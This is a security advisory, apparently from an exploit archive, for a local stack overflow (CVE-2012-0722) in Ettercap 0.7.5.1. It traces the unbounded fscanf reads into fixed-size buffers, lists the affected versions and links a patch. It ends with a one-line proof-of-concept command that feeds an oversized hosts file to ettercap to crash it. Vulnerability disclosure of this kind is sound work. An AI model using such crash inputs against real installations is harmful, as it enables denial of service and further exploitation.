Skip to content
cyberexploits
doslinuxtext

Ettercap 0.7.5.1 - Stack Overflow

Ettercap 0.7.5.1 - Stack Overflow

Publié le 2013-01-07

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/unix/dos/23945.txt7eac4c3a
raw
Title: Ettercap Stack overflow (CWE-121)

References: CVE-2012-0722

Discovered by: Sajjad Pourali

Vendor: http://www.ettercap.sourceforge.net/

Vendor contact: 13-01-01 21:20 UTC (No response)

Solution: Using the patch

Patch: http://www.securation.com/files/2013/01/ec.patch



Local: Yes

Remote: No

Impact: low



Affected:

 - ettercap 0.7.5.1

 - ettercap 0.7.5

 - ettercap 0.7.4 and earlier

Not affected:

 - ettercap 0.7.4.1



---



Trace vulnerable place:



./include/ec_inet.h:27-44

enum {

   NS_IN6ADDRSZ            = 16,

   NS_INT16SZ              = 2,



   ETH_ADDR_LEN            = 6,

   TR_ADDR_LEN             = 6,

   FDDI_ADDR_LEN           = 6,

   MEDIA_ADDR_LEN          = 6,



   IP_ADDR_LEN             = 4,

   IP6_ADDR_LEN            = 16,

   MAX_IP_ADDR_LEN         = IP6_ADDR_LEN,



   ETH_ASCII_ADDR_LEN      = sizeof("ff:ff:ff:ff:ff:ff")+1,

   IP_ASCII_ADDR_LEN       = sizeof("255.255.255.255")+1,

   IP6_ASCII_ADDR_LEN      = sizeof("ffff:ffff:ffff:ffff:ffff:ffff:255.255.255.255")+1,

   MAX_ASCII_ADDR_LEN      = IP6_ASCII_ADDR_LEN,

};



./include/ec_resolv.h:42

#define MAX_HOSTNAME_LEN   64



./src/ec_scan.c:610-614

char ip[MAX_ASCII_ADDR_LEN];

char mac[ETH_ASCII_ADDR_LEN];

char name[MAX_HOSTNAME_LEN];





./src/ec_scan.c:633-635

if (fscanf(hf, "%s %s %s\n", ip, mac, name) != 3 ||

         *ip == '#' || *mac == '#' || *name == '#')

         continue;



---



PoC:



sudo ruby -e'puts"a"*2000' > overflow && sudo ettercap -T -j overflow



---



 + Sajjad Pourali

 + http://www.securation.com

 + Contact: sajjad[at]securation.com
Voir sur GitHub